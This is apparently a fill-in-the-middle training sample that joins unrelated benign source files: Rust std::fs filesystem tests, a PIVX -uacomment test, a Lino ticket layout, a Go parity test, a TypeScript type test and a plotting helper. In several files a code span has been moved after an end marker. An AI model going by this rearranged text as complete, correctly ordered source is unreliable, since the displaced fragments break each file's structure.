/// use std::fs;
///
/// let mut perms = try!(fs::metadata("foo.txt")).permissions();
/// perms.set_readonly(true);
/// try!(fs::set_permissions("foo.txt", perms));
/// # Ok(())
/// # }
/// ```
///
/// # Errors
///
/// This function will return an error if the provided `path` doesn't exist, if
/// the process lacks permissions to change the attributes of the file, or if
/// some other I/O error is encountered.
#[unstable(feature = "fs",
reason = "a more granual ability to set specific permissions may \
be exposed on the Permissions structure itself and this \
method may not always exist")]
pub fn set_permissions<P: AsRef<Path>>(path: P, perm: Permissions) -> io::Result<()> {
fs_imp::set_perm(path.as_ref(), perm.0)
}
impl DirBuilder {
    /// Creates a new set of options with default mode/security settings for all
    /// platforms, and with recursion disabled.
pub fn new() -> DirBuilder {
DirBuilder {
inner: fs_imp::DirBuilder::new(),
recursive: false,
}
}
    /// Indicates that directories should be created recursively, creating all
    /// parent directories with the same security and permissions settings if
    /// they do not exist.
    ///
    /// This option defaults to `false`.
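    ///
    /// A minimal usage sketch (the path is an assumption for
    /// demonstration):
    ///
    /// ```
    /// use std::fs::DirBuilder;
    ///
    /// # fn foo() -> std::io::Result<()> {
    /// try!(DirBuilder::new().recursive(true).create("/some/dir/a/b"));
    /// # Ok(())
    /// # }
    /// ```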
pub fn recursive(&mut self, recursive: bool) -> &mut Self {
self.recursive = recursive;
self
}
/// Create the specified directory with the options configured in this
/// builder.
pub fn create<P: AsRef<Path>>(&self, path: P) -> io::Result<()> {
let path = path.as_ref();
if self.recursive {
self.create_dir_all(path)
} else {
self.inner.mkdir(path)
}
}
fn create_dir_all(&self, path: &Path) -> io::Result<()> {
if path == Path::new("") || path.is_dir() { return Ok(()) }
if let Some(p) = path.parent() {
try!(self.create_dir_all(p))
}
self.inner.mkdir(path)
}
}
impl AsInnerMut<fs_imp::DirBuilder> for DirBuilder {
fn as_inner_mut(&mut self) -> &mut fs_imp::DirBuilder {
&mut self.inner
}
}
#[cfg(test)]
mod tests {
#![allow(deprecated)] //rand
use prelude::v1::*;
use io::prelude::*;
use env;
use fs::{self, File, OpenOptions};
use io::{ErrorKind, SeekFrom};
use path::PathBuf;
use path::Path as Path2;
use os;
use rand::{self, StdRng, Rng};
use str;
macro_rules! check { ($e:expr) => (
match $e {
Ok(t) => t,
Err(e) => panic!("{} failed with: {}", stringify!($e), e),
}
) }
macro_rules! error { ($e:expr, $s:expr) => (
match $e {
Ok(_) => panic!("Unexpected success. Should've been: {:?}", $s),
Err(ref err) => assert!(err.to_string().contains($s),
format!("`{}` did not contain `{}`", err, $s))
}
) }
pub struct TempDir(PathBuf);
impl TempDir {
fn join(&self, path: &str) -> PathBuf {
let TempDir(ref p) = *self;
p.join(path)
}
fn path<'a>(&'a self) -> &'a Path2 {
let TempDir(ref p) = *self;
p
}
}
impl Drop for TempDir {
fn drop(&mut self) {
// Gee, seeing how we're testing the fs module I sure hope that we
// at least implement this correctly!
let TempDir(ref p) = *self;
check!(fs::remove_dir_all(p));
}
}
pub fn tmpdir() -> TempDir {
let p = env::temp_dir();
let mut r = rand::thread_rng();
let ret = p.join(&format!("rust-{}", r.next_u32()));
check!(fs::create_dir(&ret));
TempDir(ret)
}
#[test]
fn file_test_io_smoke_test() {
let message = "it's alright. have a good time";
let tmpdir = tmpdir();
let filename = &tmpdir.join("file_rt_io_file_test.txt");
{
let mut write_stream = check!(File::create(filename));
check!(write_stream.write(message.as_bytes()));
}
{
let mut read_stream = check!(File::open(filename));
let mut read_buf = [0; 1028];
let read_str = match check!(read_stream.read(&mut read_buf)) {
0 => panic!("shouldn't happen"),
n => str::from_utf8(&read_buf[..n]).unwrap().to_string()
};
assert_eq!(read_str, message);
}
check!(fs::remove_file(filename));
}
#[test]
fn invalid_path_raises() {
let tmpdir = tmpdir();
let filename = &tmpdir.join("file_that_does_not_exist.txt");
let result = File::open(filename);
if cfg!(unix) {
error!(result, "o such file or directory");
}
// error!(result, "couldn't open path as file");
// error!(result, format!("path={}; mode=open; access=read", filename.display()));
}
#[test]
fn file_test_iounlinking_invalid_path_should_raise_condition() {
let tmpdir = tmpdir();
let filename = &tmpdir.join("file_another_file_that_does_not_exist.txt");
let result = fs::remove_file(filename);
if cfg!(unix) {
error!(result, "o such file or directory");
}
// error!(result, "couldn't unlink path");
// error!(result, format!("path={}", filename.display()));
}
#[test]
fn file_test_io_non_positional_read() {
let message: &str = "ten-four";
let mut read_mem = [0; 8];
let tmpdir = tmpdir();
let filename = &tmpdir.join("file_rt_io_file_test_positional.txt");
{
let mut rw_stream = check!(File::create(filename));
check!(rw_stream.write(message.as_bytes()));
}
{
let mut read_stream = check!(File::open(filename));
{
let read_buf = &mut read_mem[0..4];
check!(read_stream.read(read_buf));
}
{
let read_buf = &mut read_mem[4..8];
check!(read_stream.read(read_buf));
}
}
check!(fs::remove_file(filename));
let read_str = str::from_utf8(&read_mem).unwrap();
assert_eq!(read_str, message);
}
#[test]
fn file_test_io_seek_and_tell_smoke_test() {
let message = "ten-four";
let mut read_mem = [0; 4];
let set_cursor = 4 as u64;
let mut tell_pos_pre_read;
let mut tell_pos_post_read;
let tmpdir = tmpdir();
let filename = &tmpdir.join("file_rt_io_file_test_seeking.txt");
{
let mut rw_stream = check!(File::create(filename));
check!(rw_stream.write(message.as_bytes()));
}
{
let mut read_stream = check!(File::open(filename));
check!(read_stream.seek(SeekFrom::Start(set_cursor)));
tell_pos_pre_read = check!(read_stream.seek(SeekFrom::Current(0)));
check!(read_stream.read(&mut read_mem));
tell_pos_post_read = check!(read_stream.seek(SeekFrom::Current(0)));
}
check!(fs::remove_file(filename));
let read_str = str::from_utf8(&read_mem).unwrap();
assert_eq!(read_str, &message[4..8]);
assert_eq!(tell_pos_pre_read, set_cursor);
assert_eq!(tell_pos_post_read, message.len() as u64);
}
#[test]
fn file_test_io_seek_and_write() {
let initial_msg = "food-is-yummy";
let overwrite_msg = "-the-bar!!";
let final_msg = "foo-the-bar!!";
let seek_idx = 3;
let mut read_mem = [0; 13];
let tmpdir = tmpdir();
let filename = &tmpdir.join("file_rt_io_file_test_seek_and_write.txt");
{
let mut rw_stream = check!(File::create(filename));
check!(rw_stream.write(initial_msg.as_bytes()));
check!(rw_stream.seek(SeekFrom::Start(seek_idx)));
check!(rw_stream.write(overwrite_msg.as_bytes()));
}
{
let mut read_stream = check!(File::open(filename));
check!(read_stream.read(&mut read_mem));
}
check!(fs::remove_file(filename));
let read_str = str::from_utf8(&read_mem).unwrap();
assert!(read_str == final_msg);
}
#[test]
fn file_test_io_seek_shakedown() {
// 01234567890123
let initial_msg = "qwer-asdf-zxcv";
let chunk_one: &str = "qwer";
let chunk_two: &str = "asdf";
let chunk_three: &str = "zxcv";
let mut read_mem = [0; 4];
let tmpdir = tmpdir();
let filename = &tmpdir.join("file_rt_io_file_test_seek_shakedown.txt");
{
let mut rw_stream = check!(File::create(filename));
check!(rw_stream.write(initial_msg.as_bytes()));
}
{
let mut read_stream = check!(File::open(filename));
check!(read_stream.seek(SeekFrom::End(-4)));
check!(read_stream.read(&mut read_mem));
assert_eq!(str::from_utf8(&read_mem).unwrap(), chunk_three);
check!(read_stream.seek(SeekFrom::Current(-9)));
check!(read_stream.read(&mut read_mem));
assert_eq!(str::from_utf8(&read_mem).unwrap(), chunk_two);
check!(read_stream.seek(SeekFrom::Start(0)));
check!(read_stream.read(&mut read_mem));
assert_eq!(str::from_utf8(&read_mem).unwrap(), chunk_one);
}
check!(fs::remove_file(filename));
}
#[test]
fn file_test_stat_is_correct_on_is_file() {
let tmpdir = tmpdir();
let filename = &tmpdir.join("file_stat_correct_on_is_file.txt");
{
let mut opts = OpenOptions::new();
let mut fs = check!(opts.read(true).write(true)
.create(true).open(filename));
let msg = "hw";
fs.write(msg.as_bytes()).unwrap();
let fstat_res = check!(fs.metadata());
assert!(fstat_res.is_file());
}
let stat_res_fn = check!(fs::metadata(filename));
assert!(stat_res_fn.is_file());
let stat_res_meth = check!(filename.metadata());
assert!(stat_res_meth.is_file());
check!(fs::remove_file(filename));
}
#[test]
fn file_test_stat_is_correct_on_is_dir() {
let tmpdir = tmpdir();
let filename = &tmpdir.join("file_stat_correct_on_is_dir");
check!(fs::create_dir(filename));
let stat_res_fn = check!(fs::metadata(filename));
assert!(stat_res_fn.is_dir());
let stat_res_meth = check!(filename.metadata());
assert!(stat_res_meth.is_dir());
check!(fs::remove_dir(filename));
}
#[test]
fn file_test_fileinfo_false_when_checking_is_file_on_a_directory() {
let tmpdir = tmpdir();
let dir = &tmpdir.join("fileinfo_false_on_dir");
check!(fs::create_dir(dir));
assert!(dir.is_file() == false);
check!(fs::remove_dir(dir));
}
#[test]
fn file_test_fileinfo_check_exists_before_and_after_file_creation() {
let tmpdir = tmpdir();
let file = &tmpdir.join("fileinfo_check_exists_b_and_a.txt");
check!(check!(File::create(file)).write(b"foo"));
assert!(file.exists());
check!(fs::remove_file(file));
assert!(!file.exists());
}
#[test]
fn file_test_directoryinfo_check_exists_before_and_after_mkdir() {
let tmpdir = tmpdir();
let dir = &tmpdir.join("before_and_after_dir");
assert!(!dir.exists());
check!(fs::create_dir(dir));
assert!(dir.exists());
assert!(dir.is_dir());
check!(fs::remove_dir(dir));
assert!(!dir.exists());
}
#[test]
fn file_test_directoryinfo_readdir() {
let tmpdir = tmpdir();
let dir = &tmpdir.join("di_readdir");
check!(fs::create_dir(dir));
let prefix = "foo";
for n in 0..3 {
let f = dir.join(&format!("{}.txt", n));
let mut w = check!(File::create(&f));
let msg_str = format!("{}{}", prefix, n.to_string());
let msg = msg_str.as_bytes();
check!(w.write(msg));
}
let files = check!(fs::read_dir(dir));
let mut mem = [0; 4];
for f in files {
let f = f.unwrap().path();
{
let n = f.file_stem().unwrap();
check!(check!(File::open(&f)).read(&mut mem));
let read_str = str::from_utf8(&mem).unwrap();
let expected = format!("{}{}", prefix, n.to_str().unwrap());
assert_eq!(expected, read_str);
}
check!(fs::remove_file(&f));
}
check!(fs::remove_dir(dir));
}
#[test]
fn file_test_walk_dir() {
let tmpdir = tmpdir();
let dir = &tmpdir.join("walk_dir");
check!(fs::create_dir(dir));
let dir1 = &dir.join("01/02/03");
check!(fs::create_dir_all(dir1));
check!(File::create(&dir1.join("04")));
let dir2 = &dir.join("11/12/13");
check!(fs::create_dir_all(dir2));
check!(File::create(&dir2.join("14")));
let files = check!(fs::walk_dir(dir));
let mut cur = [0; 2];
for f in files {
let f = f.unwrap().path();
let stem = f.file_stem().unwrap().to_str().unwrap();
let root = stem.as_bytes()[0] - b'0';
let name = stem.as_bytes()[1] - b'0';
assert!(cur[root as usize] < name);
cur[root as usize] = name;
}
check!(fs::remove_dir_all(dir));
}
#[test]
fn mkdir_path_already_exists_error() {
let tmpdir = tmpdir();
let dir = &tmpdir.join("mkdir_error_twice");
check!(fs::create_dir(dir));
let e = fs::create_dir(dir).err().unwrap();
assert_eq!(e.kind(), ErrorKind::AlreadyExists);
}
#[test]
fn recursive_mkdir() {
let tmpdir = tmpdir();
let dir = tmpdir.join("d1/d2");
check!(fs::create_dir_all(&dir));
assert!(dir.is_dir())
}
#[test]
fn recursive_mkdir_failure() {
let tmpdir = tmpdir();
let dir = tmpdir.join("d1");
let file = dir.join("f1");
check!(fs::create_dir_all(&dir));
check!(File::create(&file));
let result = fs::create_dir_all(&file);
assert!(result.is_err());
// error!(result, "couldn't recursively mkdir");
// error!(result, "couldn't create directory");
// error!(result, "mode=0700");
// error!(result, format!("path={}", file.display()));
}
#[test]
fn recursive_mkdir_slash() {
check!(fs::create_dir_all(&Path2::new("/")));
}
// FIXME(#12795) depends on lstat to work on windows
#[cfg(not(windows))]
#[test]
fn recursive_rmdir() {
let tmpdir = tmpdir();
let d1 = tmpdir.join("d1");
let dt = d1.join("t");
let dtt = dt.join("t");
let d2 = tmpdir.join("d2");
let canary = d2.join("do_not_delete");
check!(fs::create_dir_all(&dtt));
check!(fs::create_dir_all(&d2));
check!(check!(File::create(&canary)).write(b"foo"));
check!(fs::soft_link(&d2, &dt.join("d2")));
check!(fs::remove_dir_all(&d1));
assert!(!d1.is_dir());
assert!(canary.exists());
}
#[test]
fn unicode_path_is_dir() {
assert!(Path2::new(".").is_dir());
assert!(!Path2::new("test/stdtest/fs.rs").is_dir());
let tmpdir = tmpdir();
let mut dirpath = tmpdir.path().to_path_buf();
dirpath.push(&format!("test-가一ー你好"));
check!(fs::create_dir(&dirpath));
assert!(dirpath.is_dir());
let mut filepath = dirpath;
filepath.push("unicode-file-\u{ac00}\u{4e00}\u{30fc}\u{4f60}\u{597d}.rs");
check!(File::create(&filepath)); // ignore return; touch only
assert!(!filepath.is_dir());
assert!(filepath.exists());
}
#[test]
fn unicode_path_exists() {
assert!(Path2::new(".").exists());
assert!(!Path2::new("test/nonexistent-bogus-path").exists());
let tmpdir = tmpdir();
let unicode = tmpdir.path();
let unicode = unicode.join(&format!("test-각丁ー再见"));
check!(fs::create_dir(&unicode));
assert!(unicode.exists());
assert!(!Path2::new("test/unicode-bogus-path-각丁ー再见").exists());
}
#[test]
fn copy_file_does_not_exist() {
let from = Path2::new("test/nonexistent-bogus-path");
let to = Path2::new("test/other-bogus-path");
match fs::copy(&from, &to) {
Ok(..) => panic!(),
Err(..) => {
assert!(!from.exists());
assert!(!to.exists());
}
}
}
#[test]
fn copy_file_ok() {
let tmpdir = tmpdir();
let input = tmpdir.join("in.txt");
let out = tmpdir.join("out.txt");
check!(check!(File::create(&input)).write(b"hello"));
check!(fs::copy(&input, &out));
let mut v = Vec::new();
check!(check!(File::open(&out)).read_to_end(&mut v));
assert_eq!(v, b"hello");
assert_eq!(check!(input.metadata()).permissions(),
check!(out.metadata()).permissions());
}
#[test]
fn copy_file_dst_dir() {
let tmpdir = tmpdir();
let out = tmpdir.join("out");
check!(File::create(&out));
match fs::copy(&*out, tmpdir.path()) {
Ok(..) => panic!(), Err(..) => {}
}
}
#[test]
fn copy_file_dst_exists() {
let tmpdir = tmpdir();
let input = tmpdir.join("in");
let output = tmpdir.join("out");
check!(check!(File::create(&input)).write("foo".as_bytes()));
check!(check!(File::create(&output)).write("bar".as_bytes()));
check!(fs::copy(&input, &output));
let mut v = Vec::new();
check!(check!(File::open(&output)).read_to_end(&mut v));
assert_eq!(v, b"foo".to_vec());
}
#[test]
fn copy_file_src_dir() {
let tmpdir = tmpdir();
let out = tmpdir.join("out");
match fs::copy(tmpdir.path(), &out) {
Ok(..) => panic!(), Err(..) => {}
}
assert!(!out.exists());
}
#[test]
fn copy_file_preserves_perm_bits() {
let tmpdir = tmpdir();
let input = tmpdir.join("in.txt");
let out = tmpdir.join("out.txt");
let attr = check!(check!(File::create(&input)).metadata());
let mut p = attr.permissions();
p.set_readonly(true);
check!(fs::set_permissions(&input, p));
check!(fs::copy(&input, &out));
assert!(check!(out.metadata()).permissions().readonly());
check!(fs::set_permissions(&input, attr.permissions()));
check!(fs::set_permissions(&out, attr.permissions()));
}
#[cfg(not(windows))] // FIXME(#10264) operation not permitted?
#[test]
fn symlinks_work() {
let tmpdir = tmpdir();
let input = tmpdir.join("in.txt");
let out = tmpdir.join("out.txt");
check!(check!(File::create(&input)).write("foobar".as_bytes()));
check!(fs::soft_link(&input, &out));
// if cfg!(not(windows)) {
// assert_eq!(check!(lstat(&out)).kind, FileType::Symlink);
// assert_eq!(check!(out.lstat()).kind, FileType::Symlink);
// }
assert_eq!(check!(fs::metadata(&out)).len(),
check!(fs::metadata(&input)).len());
let mut v = Vec::new();
check!(check!(File::open(&out)).read_to_end(&mut v));
assert_eq!(v, b"foobar".to_vec());
}
#[cfg(not(windows))] // apparently windows doesn't like symlinks
#[test]
fn symlink_noexist() {
let tmpdir = tmpdir();
// symlinks can point to things that don't exist
check!(fs::soft_link(&tmpdir.join("foo"), &tmpdir.join("bar")));
assert_eq!(check!(fs::read_link(&tmpdir.join("bar"))),
tmpdir.join("foo"));
}
#[test]
fn readlink_not_symlink() {
let tmpdir = tmpdir();
match fs::read_link(tmpdir.path()) {
Ok(..) => panic!("wanted a failure"),
Err(..) => {}
}
}
#[test]
fn links_work() {
let tmpdir = tmpdir();
let input = tmpdir.join("in.txt");
let out = tmpdir.join("out.txt");
check!(check!(File::create(&input)).write("foobar".as_bytes()));
check!(fs::hard_link(&input, &out));
assert_eq!(check!(fs::metadata(&out)).len(),
check!(fs::metadata(&input)).len());
assert_eq!(check!(fs::metadata(&out)).len(),
check!(input.metadata()).len());
let mut v = Vec::new();
check!(check!(File::open(&out)).read_to_end(&mut v));
assert_eq!(v, b"foobar".to_vec());
// can't link to yourself
match fs::hard_link(&input, &input) {
Ok(..) => panic!("wanted a failure"),
Err(..) => {}
}
// can't link to something that doesn't exist
match fs::hard_link(&tmpdir.join("foo"), &tmpdir.join("bar")) {
Ok(..) => panic!("wanted a failure"),
Err(..) => {}
}
}
#[test]
fn chmod_works() {
let tmpdir = tmpdir();
let file = tmpdir.join("in.txt");
check!(File::create(&file));
let attr = check!(fs::metadata(&file));
assert!(!attr.permissions().readonly());
let mut p = attr.permissions();
p.set_readonly(true);
check!(fs::set_permissions(&file, p.clone()));
let attr = check!(fs::metadata(&file));
assert!(attr.permissions().readonly());
match fs::set_permissions(&tmpdir.join("foo"), p.clone()) {
Ok(..) => panic!("wanted an error"),
Err(..) => {}
}
p.set_readonly(false);
check!(fs::set_permissions(&file, p));
}
#[test]
fn sync_doesnt_kill_anything() {
let tmpdir = tmpdir();
let path = tmpdir.join("in.txt");
let mut file = check!(File::create(&path));
check!(file.sync_all());
check!(file.sync_data());
check!(file.write(b"foo"));
check!(file.sync_all());
check!(file.sync_data());
}
#[test]
fn truncate_works() {
let tmpdir = tmpdir();
let path = tmpdir.join("in.txt");
let mut file = check!(File::create(&path));
check!(file.write(b"foo"));
check!(file.sync_all());
// Do some simple things with truncation
assert_eq!(check!(file.metadata()).len(), 3);
check!(file.set_len(10));
assert_eq!(check!(file.metadata()).len(), 10);
check!(file.write(b"bar"));
check!(file.sync_all());
assert_eq!(check!(file.metadata()).len(), 10);
let mut v = Vec::new();
check!(check!(File::open(&path)).read_to_end(&mut v));
assert_eq!(v, b"foobar\0\0\0\0".to_vec());
// Truncate to a smaller length, don't seek, and then write something.
// Ensure that the intermediate zeroes are all filled in (we have `seek`ed
// past the end of the file).
check!(file.set_len(2));
assert_eq!(check!(file.metadata()).len(), 2);
check!(file.write(b"wut"));
check!(file.sync_all());
assert_eq!(check!(file.metadata()).len(), 9);
let mut v = Vec::new();
check!(check!(File::open(&path)).read_to_end(&mut v));
assert_eq!(v, b"fo\0\0\0\0wut".to_vec());
}
#[test]
fn open_flavors() {
use fs::OpenOptions as OO;
fn c<T: Clone>(t: &T) -> T { t.clone() }
let tmpdir = tmpdir();
let mut r = OO::new(); r.read(true);
let mut w = OO::new(); w.write(true);
let mut rw = OO::new(); rw.write(true).read(true);
match r.open(&tmpdir.join("a")) {
Ok(..) => panic!(), Err(..) => {}
}
// Perform each one twice to make sure that it succeeds the second time
// (where the file exists)
check!(c(&w).create(true).open(&tmpdir.join("b")));
assert!(tmpdir.join("b").exists());
check!(c(&w).create(true).open(&tmpdir.join("b")));
check!(w.open(&tmpdir.join("b")));
check!(c(&rw).create(true).open(&tmpdir.join("c")));
assert!(tmpdir.join("c").exists());
check!(c(&rw).create(true).open(&tmpdir.join("c")));
check!(rw.open(&tmpdir.join("c")));
check!(c(&w).append(true).create(true).open(&tmpdir.join("d")));
assert!(tmpdir.join("d").exists());
check!(c(&w).append(true).create(true).open(&tmpdir.join("d")));
check!(c(&w).append(true).open(&tmpdir.join("d")));
check!(c(&rw).append(true).create(true).open(&tmpdir.join("e")));
assert!(tmpdir.join("e").exists());
check!(c(&rw).append(true).create(true).open(&tmpdir.join("e")));
check!(c(&rw).append(true).open(&tmpdir.join("e")));
check!(c(&w).truncate(true).create(true).open(&tmpdir.join("f")));
assert!(tmpdir.join("f").exists());
check!(c(&w).truncate(true).create(true).open(&tmpdir.join("f")));
check!(c(&w).truncate(true).open(&tmpdir.join("f")));
check!(c(&rw).truncate(true).create(true).open(&tmpdir.join("g")));
assert!(tmpdir.join("g").exists());
check!(c(&rw).truncate(true).create(true).open(&tmpdir.join("g")));
check!(c(&rw).truncate(true).open(&tmpdir.join("g")));
check!(check!(File::create(&tmpdir.join("h"))).write("foo".as_bytes()));
check!(r.open(&tmpdir.join("h")));
{
let mut f = check!(r.open(&tmpdir.join("h")));
assert!(f.write("wut".as_bytes()).is_err());
}
assert_eq!(check!(fs::metadata(&tmpdir.join("h"))).len(), 3);
{
let mut f = check!(c(&w).append(true).open(&tmpdir.join("h")));
check!(f.write("bar".as_bytes()));
}
assert_eq!(check!(fs::metadata(&tmpdir.join("h"))).len(), 6);
{
let mut f = check!(c(&w).truncate(true).open(&tmpdir.join("h")));
check!(f.write("bar".as_bytes()));
}
assert_eq!(check!(fs::metadata(&tmpdir.join("h"))).len(), 3);
}
#[test]
fn utime() {
let tmpdir = tmpdir();
let path = tmpdir.join("a");
check!(File::create(&path));
// These numbers have to be bigger than the time in the day to account
// for timezones Windows in particular will fail in certain timezones
// with small enough values
check!(fs::set_file_times(&path, 100000, 200000));
assert_eq!(check!(path.metadata()).accessed(), 100000);
assert_eq!(check!(path.metadata()).modified(), 200000);
}
#[test]
fn utime_noexist() {
let tmpdir = tmpdir();
match fs::set_file_times(&tmpdir.join("a"), 100, 200) {
Ok(..) => panic!(),
Err(..) => {}
}
}
#[test]
fn binary_file() {
let mut bytes = [0; 1024];
StdRng::new().unwrap().fill_bytes(&mut bytes);
let tmpdir = tmpdir();
check!(check!(File::create(&tmpdir.join("test"))).write(&bytes));
let mut v = Vec::new();
check!(check!(File::open(&tmpdir.join("test"))).read_to_end(&mut v));
assert!(v == &bytes[..]);
}
#[test]
#[cfg(not(windows))]
fn unlink_readonly() {
let tmpdir = tmpdir();
let path = tmpdir.join("file");
check!(File::create(&path));
let mut perm = check!(fs::metadata(&path)).permissions();
perm.set_readonly(true);
check!(fs::set_permissions(&path, perm));
check!(fs::remove_file(&path));
}
#[test]
fn mkdir_trailing_slash() {
let tmpdir = tmpdir();
let path = tmpdir.join("file");
check!(fs::create_dir_all(&path.join("a/")));
}
#[test]
#[cfg(not(windows))]
fn realpath_works() {
let tmpdir = tmpdir();
let tmpdir = fs::canonicalize(tmpdir.path()).unwrap();
let file = tmpdir.join("test");
let dir = tmpdir.join("test2");
let link = dir.join("link");
let linkdir = tmpdir.join("test3");
File::create(&file).unwrap();
fs::create_dir(&dir).unwrap();
fs::soft_link(&file, &link).unwrap();
fs::soft_link(&dir, &linkdir).unwrap();
assert!(link.symlink_metadata().unwrap().file_type().is_symlink());
assert_eq!(fs::canonicalize(&tmpdir).unwrap(), tmpdir);
assert_eq!(fs::canonicalize(&file).unwrap(), file);
assert_eq!(fs::canonicalize(&link).unwrap(), file);
assert_eq!(fs::canonicalize(&linkdir).unwrap(), dir);
assert_eq!(fs::canonicalize(&linkdir.join("link")).unwrap(), file);
}
#[test]
#[cfg(not(windows))]
fn realpath_works_tricky() {
let tmpdir = tmpdir();
let tmpdir = fs::canonicalize(tmpdir.path()).unwrap();
let a = tmpdir.join("a");
let b = a.join("b");
let c = b.join("c");
let d = a.join("d");
let e = d.join("e");
let f = a.join("f");
fs::create_dir_all(&b).unwrap();
fs::create_dir_all(&d).unwrap();
File::create(&f).unwrap();
fs::soft_link("../d/e", &c).unwrap();
fs::soft_link("../f", &e).unwrap();
assert_eq!(fs::canonicalize(&c).unwrap(), f);
assert_eq!(fs::canonicalize(&e).unwrap(), f);
}
#[test]
fn dir_entry_methods() {
let tmpdir = tmpdir();
fs::create_dir_all(&tmpdir.join("a")).unwrap();
File::create(&tmpdir.join("b")).unwrap();
for file in tmpdir.path().read_dir().unwrap().map(|f| f.unwrap()) {
let fname = file.file_name();
match fname.to_str() {
Some("a") => {
assert!(file.file_type().unwrap().is_dir());
assert!(file.metadata().unwrap().is_dir());
}
Some("b") => {
assert!(file.file_type().unwrap().is_file());
assert!(file.metadata().unwrap().is_file());
}
f => panic!("unknown file name: {:?}", f),
}
}
}
}<|fim▁end|> | |
<|file_name|>feature_uacomment.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3
# Copyright (c) 2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the -uacomment option."""
from test_framework.test_framework import PivxTestFramework
from test_framework.util import assert_equal
class UacommentTest(PivxTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
def run_test(self):
self.log.info("test multiple -uacomment")
test_uacomment = self.nodes[0].getnetworkinfo()["subversion"][-12:-1]
assert_equal(test_uacomment, "(testnode0)")
self.restart_node(0, ["-uacomment=foo"])
foo_uacomment = self.nodes[0].getnetworkinfo()["subversion"][-17:-1]
assert_equal(foo_uacomment, "(testnode0; foo)")
self.log.info("test -uacomment max length")
self.stop_node(0)
expected = "exceeds maximum length (256). Reduce the number or size of uacomments."
self.assert_start_raises_init_error(0, ["-uacomment=" + 'a' * 256], expected)
self.log.info("test -uacomment unsafe characters")<|fim▁hole|> for unsafe_char in ['/', ':', '(', ')']:
expected = "User Agent comment (" + unsafe_char + ") contains unsafe characters"
self.assert_start_raises_init_error(0, ["-uacomment=" + unsafe_char], expected)
if __name__ == '__main__':
UacommentTest().main()<|fim▁end|> | |
<|file_name|>models.py<|end_file_name|><|fim▁begin|># -*- coding: UTF-8 -*-
# Copyright 2016-2017 Rumma & Ko Ltd
# License: BSD (see file COPYING for details)
from lino_xl.lib.tickets.models import *
from lino.api import _
Ticket.hide_elements('closed')
# class Ticket(Ticket):
# class Meta(Ticket.Meta):
# app_label = 'tickets'
# verbose_name = _("Plea")
# verbose_name_plural = _("Pleas")
# abstract = dd.is_abstract_model(__name__, 'Ticket')
# ActiveTickets._label = _("Active pleas")
# UnassignedTickets._label = _("Unassigned pleas")
# PublicTickets._label = _("Public pleas")
# TicketsToTriage._label = _("Pleas to triage")
# TicketsToTalk._label = _("Pleas to talk")
# # TicketsToDo._label = _("Pleas to to")
# AllTickets._label = _("All pleas")
dd.update_field(
'tickets.Ticket', 'upgrade_notes', verbose_name=_("Solution"))
# dd.update_field(
# 'tickets.Ticket', 'state', default=TicketStates.todo.as_callable)
class TicketDetail(TicketDetail):
main = "general history_tab more"
general = dd.Panel("""
general1:60 votes.VotesByVotable:20 uploads.UploadsByController<|fim▁hole|> """, label=_("General"))
general1 = """
summary:40 id:6 deadline
user:12 end_user:12 #faculty #topic
site workflow_buttons
"""
history_tab = dd.Panel("""
changes.ChangesByMaster:50 #stars.StarsByController:20
""", label=_("History"), required_roles=dd.login_required(Triager))
more = dd.Panel("""
more1:60 #skills.AssignableWorkersByTicket:20
upgrade_notes LinksByTicket skills.OffersByDemander
""", label=_("More"), required_roles=dd.login_required(Triager))
more1 = """
created modified ticket_type:10
state priority project
# standby feedback closed
"""
Tickets.detail_layout = TicketDetail()<|fim▁end|> | description:30 comments.CommentsByRFC:30 skills.DemandsByDemander #working.SessionsByTicket:20 |
<|file_name|>5.0-parity_test.go<|end_file_name|><|fim▁begin|><|fim▁hole|>package epi
import (
"testing"
"github.com/stretchr/testify/assert"
)
// Write a function to calculate the parity
// returns 1 if the number of set bits is odd
// returns 0 if the number of set bits is even
func parity(n uint64) int {
count := 0
for i := 0; i < 64; i++ {
if (n & (1 << uint64(i))) > 0 {
count++
}
}
if count%2 == 0 {
return 0
}
return 1
}
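// A hedged alternative sketch: fold the word with XOR so the answer falls
// out in O(log n) shifts instead of 64 loop iterations. The names below
// are our own for illustration and not part of the original exercise.
func parityXorFold(n uint64) int {
	n ^= n >> 32
	n ^= n >> 16
	n ^= n >> 8
	n ^= n >> 4
	n ^= n >> 2
	n ^= n >> 1
	return int(n & 1)
}
func TestParityXorFoldMatchesParity(t *testing.T) {
	for _, v := range []uint64{0, 1, 3, 7, 1 << 63, 0xDEADBEEF} {
		assert.Equal(t, parity(v), parityXorFold(v))
	}
}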
func TestGoParity(t *testing.T) {
assert.Equal(t, 0, parity(3))
assert.Equal(t, 1, parity(1))
}<|fim▁end|> | |
<|file_name|>test.ts<|end_file_name|><|fim▁begin|>/*
* @license Apache-2.0
*
* Copyright (c) 2020 The Stdlib Authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
import rampf = require( './index' );
// TESTS //
// The function returns a number...
{
rampf( 2 ); // $ExpectType number
}
// The function does not compile if provided a value other than a number...
{
rampf( true ); // $ExpectError
rampf( false ); // $ExpectError
rampf( null ); // $ExpectError<|fim▁hole|> rampf( undefined ); // $ExpectError
rampf( '5' ); // $ExpectError
rampf( [] ); // $ExpectError
rampf( {} ); // $ExpectError
rampf( ( x: number ): number => x ); // $ExpectError
}
// The function does not compile if provided insufficient arguments...
{
rampf(); // $ExpectError
}<|fim▁end|> | |
<|file_name|>history.py<|end_file_name|><|fim▁begin|>def plotHistory(plot_context, axes):
"""
    @type plot_context: PlotContext
    @type axes: matplotlib.axes.Axes
"""
plot_config = plot_context.plotConfig()
if (
not plot_config.isHistoryEnabled()
or plot_context.history_data is None
or plot_context.history_data.empty
):
return
data = plot_context.history_data
style = plot_config.historyStyle()
lines = axes.plot_date(
x=data.index.values,
y=data,<|fim▁hole|> linestyle=style.line_style,
linewidth=style.width,
markersize=style.size,
)
if len(lines) > 0 and style.isVisible():
plot_config.addLegendItem("History", lines[0])<|fim▁end|> | color=style.color,
alpha=style.alpha,
marker=style.marker, |
